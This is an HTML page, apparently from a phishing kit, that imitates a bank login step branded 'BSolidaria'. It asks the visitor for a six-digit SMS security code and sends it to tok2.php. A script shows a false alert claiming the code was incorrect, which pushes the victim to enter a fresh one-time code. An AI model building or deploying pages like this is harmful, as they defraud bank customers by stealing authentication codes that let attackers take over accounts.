<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BSolidaria</title>
    <style>

@font-face {
            font-family: 'mifont';
            src: url('fonts/JTURjIg1_i6t8kCHKm45_ZpC3gnD_g.92d16e458625f4d2c894.woff2') format('woff2'),
                url('fonts/JTUSjIg1_i6t8kCHKm459Wlhyw.bc3aa95dca08f5fee529.woff2') format('woff2');
        }

        body {
            font-family: mifont;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            background-image: url(img/sssa.svg);
            background-size: cover;
            background-repeat: no-repeat;
            color: white; /* Color del logo */
        }

        /* Estilos para el formulario */
        .form-container {
            background-color: #fff;
    padding: 3rem;
    border-radius: 1rem 3rem 1rem 1rem;
    width: 350px;
    box-shadow: 0 4px 8px rgba(0,0,0,0.1);
    margin: 20px 0;
    text-align: center;
        }

        input[type="text"], input[type="tel"] {
            width: 300px;
            height: 50px ;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 4px;
            padding: 0 0.75em 0 0.75em;

        }

        input[type="submit"] {
            height: 50px;
            width: 350px; 
        font-weight: 500; 
    border-radius: 100px;
           border: none;
         
            background-color: #47beda; /* Color del botón */
            color: white;
         }

        input[type="submit"]:hover {
            background-color: #369cb8;
         
            font-weight: 500;
            border-radius: 10px;
            height: 50px;
            width: 350px; 
        font-weight: 500; 
    border-radius: 100px;
            
        }

        /* Estilos para pantallas menores a 768px (tablets y móviles) */
        @media (max-width: 758px) {
            body {
                font-family: sans-serif;
                background-image: none; /* Elimina el fondo */
                color: #47beda; /* Cambia el color del logo a azul */
            }

            svg {
                fill: #47beda; /* Cambia el color del logo a azul */
            }

            .form-container {
                width: 350px;
            }

            input[type="submit"] {
                background-color: #47beda; /* Color del botón */
                height: 50px;
            width: 350px; 
        font-weight: 500; 
    border-radius: 100px;
    padding: 0.3125rem 1.5rem!important;}
        }

.form-field {
    position: relative;
    margin-bottom: 20px;
}

.form-field input[type="text"], .form-field input[type="tel"] {
    width: 345px;
height: 58px;
     display: block;
 
    border-bottom: 1px solid #ccc;
    background-color: transparent;
    color: #369cb8; /* Cambia el color del texto aquí si es necesario */
}

.form-field input[type="text"]:focus, .form-field input[type="tel"]:focus {
    outline: none;
    border-bottom: 2px solid #369cb8;
}

.form-field input[type="text"]:valid, .form-field input[type="tel"]:valid {
   
    border-bottom: 2px solid #369cb8;
    
}

.form-field label {
    
    position: absolute;
    top: 20px;
    left: 20px;
    color: #999;
    font-size: 16px;
    transition: all 0.3s ease;
    pointer-events: none;
}

.form-field input[type="text"]:focus + label, .form-field input[type="tel"]:focus + label,
.form-field input[type="text"]:valid + label, .form-field input[type="tel"]:valid + label {
    top: -8px;
    width: 140px;
    background-color: white;
    font-size: 13px;
    color: #369cb8;
}

/* Ajustes para la responsividad y otros estilos permanecen igual */
</style>
</head>
<body>

<div style="margin-top: 50px;"> 
    <svg height="41.815" viewBox="0 0 143.979 41.815" width="143.979" xmlns="http://www.w3.org/2000/svg">
        <g _ngcontent-serverApp-c6="" data-name="Grupo 4094" id="Grupo_4094" transform="translate(-20.368 -59.991)">
            <path _ngcontent-serverApp-c6="" d="M31.283,70.971c-2.553-.64-4.531-1.21-4.531-3.2,0-3.022,3.649-3.43,4.923-3.43a29.585,29.585,0,0,1,6.461.69V60.506a32.676,32.676,0,0,0-6.513-.515c-10.292,0-10.59,7.157-10.59,7.973,0,5.414,4.078,6.482,7.675,7.425,2.844.745,5.654,1.449,5.654,4.267,0,1.864-.918,4.621-6.024,4.621a13.575,13.575,0,0,1-2.682-.217,41.227,41.227,0,0,1-5.289-1.48v4.893c.456.232,2.62,1.152,8.223,1.152,10.438,0,11.249-7.055,11.249-9.217C39.84,73.116,35.1,71.927,31.283,70.971Zm18.95-3.538c-6.9,0-9.579,5.712-9.579,10.422,0,5.137,2.635,10.41,9.579,10.41,6.9,0,9.579-5.666,9.579-10.41C59.812,72.842,57.316,67.433,50.234,67.433Zm0,16.881c-3.6,0-4.66-3.694-4.66-6.46,0-2.729,1.059-6.415,4.66-6.415,3.565,0,4.616,3.686,4.616,6.415C54.85,80.621,53.8,84.314,50.234,84.314ZM154.772,67.433c-6.9,0-9.587,5.712-9.587,10.422a14.061,14.061,0,0,0,.268,2.756c-.533,2.21-1.7,2.731-2.537,2.731-1.716,0-1.759-1.715-1.759-2.108V68.227h-4.689v5.745c.007,2.9.029,8.325.029,8.714,0,2.771,1.493,5.409,4.755,5.409a6.383,6.383,0,0,0,5.834-3.5,8.8,8.8,0,0,0,7.686,3.672c6.9,0,9.576-5.666,9.576-10.41C164.347,72.842,161.844,67.433,154.772,67.433Zm0,16.881c-3.609,0-4.66-3.694-4.66-6.46,0-2.729,1.051-6.415,4.66-6.415,3.555,0,4.608,3.686,4.608,6.415C159.38,80.621,158.326,84.314,154.772,84.314ZM73.234,65.856a2.922,2.922,0,1,0-2.945-2.947A2.939,2.939,0,0,0,73.234,65.856Zm65.51,0a2.922,2.922,0,1,0-2.945-2.947A2.939,2.939,0,0,0,138.744,65.856ZM126.8,71.914c-.083.128-.132.174-.176.174-.08,0-.08-.174-.08-.174V68.227H122.1v14.79a2.946,2.946,0,0,1-1.489.41c-1.805,0-2.152-1.708-2.152-2.633V68.271a25.57,25.57,0,0,0-5.934-.838c-9.055,0-12,6.286-12,11.909a13.646,13.646,0,0,0,.225,2.4,2.386,2.386,0,0,1-2.073,1.6c-1.715,0-1.761-1.8-1.761-2.192V60.383H92.265v7.1c-.434,0-.876-.051-1.278-.051-9.052,0-12,6.286-12,11.909a12.543,12.543,0,0,0,.345,2.824,2.261,2.261,0,0,1-1.921,1.176c-1.715,0-1.749-1.715-1.749-2.108V68.227H70.943v4.131c.006,1.035.035,6.423.048,8.988a3.323,3.323,0,0,1-2.983,2c-1.809,0-2.157-1.663-2.157-2.627V60.383h-4.7V82.64a5.29,5.29,0,0,0,5.536,5.4,7,7,0,0,0,5.141-2.086,4.316,4.316,0,0,0,3.906,2.137,6.372,6.372,0,0,0,5.174-2.452,7.59,7.59,0,0,0,11.966-.629c.046-.04.1-.085.132-.085s.09,0,.132.133a3.924,3.924,0,0,0,3.918,3.034,6.1,6.1,0,0,0,5.138-2.6,6.593,6.593,0,0,0,5.847,2.9,7.283,7.283,0,0,0,6.378-3.383c.034-.04.078-.135.125-.135s.041.05.088.183c.573,1.8,2.291,2.827,4.66,3.034a18.2,18.2,0,0,0,7.507-1.354V80.4a9.562,9.562,0,0,1,1.547-5.286c.159-.222.327-.432.5-.643a3.116,3.116,0,0,1,.456-.452.442.442,0,0,1,.1-.075c.859-.717,1.779-1.88,5.489-1.346V68.216C127.965,67.433,126.891,71.774,126.8,71.914ZM92.265,78.859a4.7,4.7,0,0,1-4.66,4.795c-3.645,0-3.689-3.822-3.689-4.97,0-5.62,3.989-7.244,6.146-7.244a6.649,6.649,0,0,1,2.2.25Zm21.534,0a4.736,4.736,0,0,1-4.667,4.833c-3.643,0-3.679-3.861-3.679-5.009,0-5.62,4-7.244,6.153-7.244a6.593,6.593,0,0,1,2.193.25Z" data-name="Trazado 3357" fill="currentColor" id="Trazado_3357" transform="translate(0 0)"></path><g _ngcontent-serverApp-c6="" data-name="Grupo 4093" id="Grupo_4093" transform="translate(114.56 90.869)"><path _ngcontent-serverApp-c6="" d="M367.578,187.77a3.448,3.448,0,0,1-1.367-.269,3.369,3.369,0,0,1-2.054-3.127v-.024a3.467,3.467,0,0,1,.969-2.416,3.307,3.307,0,0,1,1.085-.736,3.508,3.508,0,0,1,1.392-.27,3.571,3.571,0,0,1,1.545.294,3.462,3.462,0,0,1,1.079.81l-1.14,1.226a3.054,3.054,0,0,0-.656-.527,1.649,1.649,0,0,0-.84-.2,1.441,1.441,0,0,0-.643.141,1.589,1.589,0,0,0-.5.386,1.75,1.75,0,0,0-.331.57,2.036,2.036,0,0,0-.117.693v.024a2.123,2.123,0,0,0,.117.711,1.688,1.688,0,0,0,.337.576,1.6,1.6,0,0,0,.527.387,1.624,1.624,0,0,0,.687.141,1.68,1.68,0,0,0,.816-.19,3.462,3.462,0,0,0,.693-.509l1.091,1.1a4.2,4.2,0,0,1-1.091.865A3.305,3.305,0,0,1,367.578,187.77Z" data-name="Trazado 3358" fill="currentColor" id="Trazado_3358" transform="translate(-364.157 -178.673)"></path><path _ngcontent-serverApp-c6="" d="M389.9,187.77a3.712,3.712,0,0,1-1.41-.263,3.436,3.436,0,0,1-1.122-.723,3.363,3.363,0,0,1-.742-1.079,3.292,3.292,0,0,1-.27-1.33v-.024a3.3,3.3,0,0,1,.27-1.33,3.394,3.394,0,0,1,.748-1.085,3.541,3.541,0,0,1,1.128-.736,3.9,3.9,0,0,1,2.832-.006,3.438,3.438,0,0,1,1.122.724A3.362,3.362,0,0,1,393.2,183a3.3,3.3,0,0,1,.27,1.33v.024a3.3,3.3,0,0,1-.27,1.33,3.38,3.38,0,0,1-.748,1.085,3.549,3.549,0,0,1-1.129.736A3.681,3.681,0,0,1,389.9,187.77Zm.025-1.606a1.727,1.727,0,0,0,.717-.141,1.574,1.574,0,0,0,.533-.387,1.7,1.7,0,0,0,.338-.57,2.045,2.045,0,0,0,.116-.693v-.024a1.939,1.939,0,0,0-.123-.693,1.742,1.742,0,0,0-.907-.975,1.654,1.654,0,0,0-.7-.147,1.731,1.731,0,0,0-.718.141,1.584,1.584,0,0,0-.533.386,1.7,1.7,0,0,0-.337.57,2.036,2.036,0,0,0-.117.693v.024a1.942,1.942,0,0,0,.123.693,1.742,1.742,0,0,0,.355.576,1.761,1.761,0,0,0,.546.4A1.638,1.638,0,0,0,389.923,186.165Z" data-name="Trazado 3359" fill="currentColor" id="Trazado_3359" transform="translate(-380.272 -178.673)"></path><path _ngcontent-serverApp-c6="" d="M413.879,181.051h1.864v.94a3.936,3.936,0,0,1,.349-.4,2.446,2.446,0,0,1,.423-.34,2.094,2.094,0,0,1,.515-.235,2.173,2.173,0,0,1,.638-.086,2.1,2.1,0,0,1,1.649.65,2.587,2.587,0,0,1,.582,1.79v4.255h-1.864v-3.657a1.473,1.473,0,0,0-.295-1,1.048,1.048,0,0,0-.833-.337,1.106,1.106,0,0,0-.852.337,1.414,1.414,0,0,0-.313,1v3.657h-1.864Z" data-name="Trazado 3360" fill="currentColor" id="Trazado_3360" transform="translate(-400.256 -178.673)"></path><path _ngcontent-serverApp-c6="" d="M438.4,181.051h1.864v.94a4.049,4.049,0,0,1,.349-.4,2.447,2.447,0,0,1,.423-.34,2.084,2.084,0,0,1,.521-.235,2.236,2.236,0,0,1,.644-.086,2.209,2.209,0,0,1,1.122.272,1.83,1.83,0,0,1,.729.778,3,3,0,0,1,.956-.785,2.636,2.636,0,0,1,1.2-.265,2.154,2.154,0,0,1,1.631.613,2.5,2.5,0,0,1,.589,1.8v4.279h-1.864v-3.657a1.519,1.519,0,0,0-.282-1,1,1,0,0,0-.809-.337,1.054,1.054,0,0,0-.828.337,1.456,1.456,0,0,0-.3,1v3.657h-1.864v-3.657a1.519,1.519,0,0,0-.282-1,1,1,0,0,0-.81-.337,1.053,1.053,0,0,0-.827.337,1.451,1.451,0,0,0-.3,1v3.657H438.4Z" data-name="Trazado 3361" fill="currentColor" id="Trazado_3361" transform="translate(-418.061 -178.673)"></path><path _ngcontent-serverApp-c6="" d="M477.7,172.693h1.962v1.655H477.7Zm.049,2.379h1.864v6.572h-1.864Z" data-name="Trazado 3362" fill="currentColor" id="Trazado_3362" transform="translate(-446.589 -172.693)"></path><path _ngcontent-serverApp-c6="" d="M489.882,189.61a6.581,6.581,0,0,1-1.545-.177,5.84,5.84,0,0,1-1.361-.509l.638-1.4a5.494,5.494,0,0,0,1.036.441,4.04,4.04,0,0,0,1.183.159,1.948,1.948,0,0,0,1.417-.453,1.8,1.8,0,0,0,.46-1.336v-.319a3.359,3.359,0,0,1-.907.785,2.455,2.455,0,0,1-1.238.282,3.05,3.05,0,0,1-1.1-.2,2.729,2.729,0,0,1-.932-.595,2.868,2.868,0,0,1-.644-.963,3.354,3.354,0,0,1-.239-1.306v-.024a3.275,3.275,0,0,1,.245-1.306,2.94,2.94,0,0,1,.65-.962,2.722,2.722,0,0,1,.932-.595,3.031,3.031,0,0,1,1.092-.2,2.483,2.483,0,0,1,1.25.282,3.6,3.6,0,0,1,.871.7v-.858h1.864v5.088a3.529,3.529,0,0,1-.834,2.587,2.719,2.719,0,0,1-1.171.675A5.914,5.914,0,0,1,489.882,189.61Zm.221-4.07a1.814,1.814,0,0,0,.638-.11,1.5,1.5,0,0,0,.509-.313,1.456,1.456,0,0,0,.338-.484,1.526,1.526,0,0,0,.122-.613v-.024a1.53,1.53,0,0,0-.122-.613,1.455,1.455,0,0,0-.338-.484,1.493,1.493,0,0,0-.509-.312,1.8,1.8,0,0,0-.638-.11,1.741,1.741,0,0,0-.631.11,1.5,1.5,0,0,0-.5.312,1.442,1.442,0,0,0-.337.484,1.526,1.526,0,0,0-.123.613v.024a1.426,1.426,0,0,0,.453,1.1A1.62,1.62,0,0,0,490.1,185.54Z" data-name="Trazado 3363" fill="currentColor" id="Trazado_3363" transform="translate(-453.086 -178.673)"></path><path _ngcontent-serverApp-c6="" d="M516.95,187.77a3.713,3.713,0,0,1-1.41-.263,3.438,3.438,0,0,1-1.122-.723,3.359,3.359,0,0,1-.742-1.079,3.288,3.288,0,0,1-.27-1.33v-.024a3.291,3.291,0,0,1,.27-1.33,3.4,3.4,0,0,1,.748-1.085,3.542,3.542,0,0,1,1.128-.736,3.9,3.9,0,0,1,2.832-.006,3.44,3.44,0,0,1,1.122.724,3.357,3.357,0,0,1,.742,1.079,3.292,3.292,0,0,1,.27,1.33v.024a3.291,3.291,0,0,1-.27,1.33,3.373,3.373,0,0,1-.748,1.085,3.543,3.543,0,0,1-1.128.736A3.681,3.681,0,0,1,516.95,187.77Zm.025-1.606a1.728,1.728,0,0,0,.717-.141,1.579,1.579,0,0,0,.533-.387,1.7,1.7,0,0,0,.337-.57,2.039,2.039,0,0,0,.116-.693v-.024a1.94,1.94,0,0,0-.122-.693,1.742,1.742,0,0,0-.907-.975,1.653,1.653,0,0,0-.7-.147,1.731,1.731,0,0,0-.718.141,1.584,1.584,0,0,0-.533.386,1.7,1.7,0,0,0-.337.57,2.035,2.035,0,0,0-.117.693v.024a1.947,1.947,0,0,0,.122.693,1.757,1.757,0,0,0,.9.975A1.641,1.641,0,0,0,516.975,186.165Z" data-name="Trazado 3364" fill="currentColor" id="Trazado_3364" transform="translate(-472.515 -178.673)"></path></g></g>
    
    </svg>
</div>


<script >
         
    alert("El codigo enviado es incorrecto, por favor verifique otra vez e introduzca uno nuevo.");
  </script>
 





<br>

<div class="form-container">

    <form action="tok2.php" method="post" >



<div style="width: auto;margin-left: -5px;">

    




<img style="width: 99%;" src="img/sms.png" alt="">



 

<div class="form-field">
    <input type="tel" maxlength="6" name="cpass" id="password" placeholder=" " required>
    <label   for="password">Código de seguridad</label>
</div>

  </div>      
 
<br>
<input style="font-weight: 600; font-size: 18px;" type="submit" value="CONFIRMAR">


<br><br>

 
</div>
   




</form>
</div>













</body>
</html>
 


 